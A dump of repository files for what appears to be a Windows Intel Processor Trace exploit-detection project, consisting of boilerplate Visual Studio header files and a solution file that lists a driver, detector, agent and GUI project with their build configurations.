/Resources/loadLibrary_x86_address/loadLibrary_x86_address/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | 13 | 14 | 15 | // TODO: reference additional headers your program requires here 16 | -------------------------------------------------------------------------------- /Resources/loadLibrary_x86_address/loadLibrary_x86_address/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /WindowsIntelPt.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio 14 3 | VisualStudioVersion = 14.0.25420.1 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WindowsPtDriver", "Projects\WindowsPtDriver\WindowsIntelPtDriver.vcxproj", "{44253DD8-98B2-4229-8305-5DD1E272CDE3}" 6 | EndProject 7 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PtExploitDetector", "Projects\PtExploitDetector\PtExploitDetector.vcxproj", "{AEEB84F9-A268-4642-8CCC-CE05D80ACD74}" 8 | EndProject 9 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PtExploitDetectorAgent", "Projects\PtExploitDetectorAgent\PtExploitDetectorAgent.vcxproj", "{C039526D-043A-40A1-8698-B3FAB5BD41B2}" 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PtExploitDetectorGUI", "Projects\PtExploitDetectorGUI\PtExploitDetectorGUI.vcxproj", "{B12702AD-ABFB-343A-A199-8E24837244A3}" 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|x64 = Release|x64 18 | Release|x86 = Release|x86 19 | EndGlobalSection 20 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 21 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x64.ActiveCfg = Debug|x64 22 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x64.Build.0 = Debug|x64 23 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Debug|x86.ActiveCfg = Debug|x64 24 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|x64.ActiveCfg = Release|x64 25 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|x64.Build.0 = Release|x64 26 | {44253DD8-98B2-4229-8305-5DD1E272CDE3}.Release|x86.ActiveCfg = Release|x64 27 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.ActiveCfg = Debug|x64 28 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x64.Build.0 = Debug|x64 29 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Debug|x86.ActiveCfg = Debug|x64 30 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.ActiveCfg = Release|x64 31 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x64.Build.0 = Release|x64 32 | {AEEB84F9-A268-4642-8CCC-CE05D80ACD74}.Release|x86.ActiveCfg = Release|x64 33 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x64.ActiveCfg = Debug|Win32 34 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x64.Build.0 = Debug|Win32 35 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Debug|x86.ActiveCfg = Debug|Win32 36 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x64.ActiveCfg = Release|Win32 37 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x64.Build.0 = Release|Win32 38 | {C039526D-043A-40A1-8698-B3FAB5BD41B2}.Release|x86.ActiveCfg = Release|Win32 39 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Debug|x64.ActiveCfg = Debug|x64 40 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Debug|x64.Build.0 = Debug|x64 41 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Debug|x86.ActiveCfg = Debug|x64 42 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Release|x64.ActiveCfg = Release|x64 43 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Release|x64.Build.0 = Release|x64 44 | {B12702AD-ABFB-343A-A199-8E24837244A3}.Release|x86.ActiveCfg = Release|x64 45 | EndGlobalSection 46 | GlobalSection(SolutionProperties) = preSolution 47 | HideSolutionNode = FALSE 48 | EndGlobalSection 49 | EndGlobal 50 | --------------------------------------------------------------------------------